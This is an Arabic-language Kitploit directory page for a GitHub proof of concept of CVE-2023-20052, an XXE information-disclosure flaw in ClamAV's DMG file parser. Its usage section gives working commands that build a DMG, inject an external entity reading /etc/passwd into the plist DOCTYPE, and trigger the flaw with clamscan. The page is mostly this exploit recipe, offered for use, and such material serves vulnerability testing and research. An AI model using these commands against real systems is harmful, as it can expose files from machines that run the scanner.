Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-20052 — CVE-2023-20052، ثغرة تسريب معلومات في محلل ملفات DMG في ClamAV | Kitploit
أدوات/GitHubGitHub/nokn0wthing/cve-2023-20052
تحليل الثغرات الأمنيةالاستغلالجمع المعلوماتالاختبار العشوائيتحليل البرمجيات الخبيثة
GitHubnokn0wthing/cve-2023-20052

CVE-2023-20052

CVE-2023-20052، ثغرة تسريب معلومات في محلل ملفات DMG في ClamAV

عرض المستودع
275منذ 3 سنواتتمت المراجعة من قبل Kitploit

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-20052

CVE-2023-20052، ثغرة تسريب معلومات في محلل ملفات DMG من ClamAV

الاستخدام
لإنشاء ملف DMG خبيث

root@kitploit:~
git clone https://github.com/nokn0wthing/CVE-2023-20052.git
cd CVE-2023-20052
sudo docker build -t cve-2023-20052 .
sudo docker run -v $(pwd):/exploit -it cve-2023-20052 bash

genisoimage -D -V "exploit" -no-pad -r -apple -file-mode 0777 -o test.img . && dmg dmg test.img test.dmg
bbe -e 's|<!DOCTYPE plist PUBLIC "-//Apple Computer//DTD PLIST 1.0//EN" "http://www.apple.com/DTDs/PropertyList-1.0.dtd">|<!DOCTYPE plist [<!ENTITY xxe SYSTEM "/etc/passwd"> ]>|' -e 's/blkx/&xxe\;/' test.dmg -o exploit.dmg

لتشغيل الثغرة
clamscan --debug exploit.dmg

تنزيل الأداة